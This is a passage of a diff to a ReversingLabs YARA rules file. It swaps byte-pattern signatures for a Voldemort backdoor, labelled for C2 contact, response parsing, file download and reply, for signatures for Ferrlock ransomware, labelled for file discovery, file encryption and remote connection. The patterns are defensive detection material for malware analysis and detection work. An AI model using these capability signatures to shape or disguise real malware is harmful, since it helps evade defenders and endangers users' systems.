-            48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8
-            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89
-            C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+		$remote_connection_p1 = {
+            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
+            8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D
         }
-		$parse_c2_response = {
-            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48
-            8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B
-            55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89
-            D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48
-            89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3
+		$remote_connection_p2 = {
+            2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? EB ?? 66 0F BE 06 8D
+            8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ??
+            C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50
+            6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85
+            C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68
+            ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF
+            D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81
+            C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ??
+            8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            E9 ?? ?? ?? ?? E8
         }
-		$download_file_from_c2_p1 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
-            ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48
+		$encrypt_files_p1 = {
+            66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ??
+            ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D
         }
-		$download_file_from_c2_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49
-            89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48
-            89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B
-            45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+		$encrypt_files_p2 = {
+            8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ??
+            ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88
+            85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D
+            ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ??
+            52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ??
+            C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51
         }
-		$reply_to_c2_server = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
-            ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89
-            D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89
-            C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
-            ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81
-            C4 ?? ?? ?? ?? 5B 5D C3
+		$encrypt_files_p3 = {
+            8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ??
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ??
+            ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75
+            ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43
+        }
+		$encrypt_files_p4 = {
+            85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45
+            ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D
+        }
+		$encrypt_files_p5 = {
+            85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+        }
+		$encrypt_files_p6 = {
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ??
+            ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ??
+            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ??
+            ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            68
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $anti_sandbox_detect_environment ) and ( $collect_host_information ) and ( $contact_c2_server ) and ( $parse_c2_response ) and ( all of ( $download_file_from_c2_p* ) ) and ( $reply_to_c2_server )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Win64_Backdoor_Voldemort : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Voldemort backdoor."
+		description = "Yara rule that detects Ferrlock ransomware."
 		author = "ReversingLabs"
-		id = "d770bd79-5141-50a0-8cf7-bca1cf5f23e1"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		id = "745ce529-46d0-56ed-a8fa-b41b26b068f4"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Voldemort.yara#L1-L208"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1fe2abe17436d2965e34d1f10223af50d9600809fdef234e7d89c74fa33228a9"
+		logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Voldemort"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ferrlock"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$decrypt_configuration_p1 = {
-            4C 8B DC 55 56 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 49
-            89 5B ?? 33 F6 49 89 7B ?? 4D 89 6B ?? 48 89 4C 24 ?? 66 C7 44 24 ?? ?? ?? C6 44 24
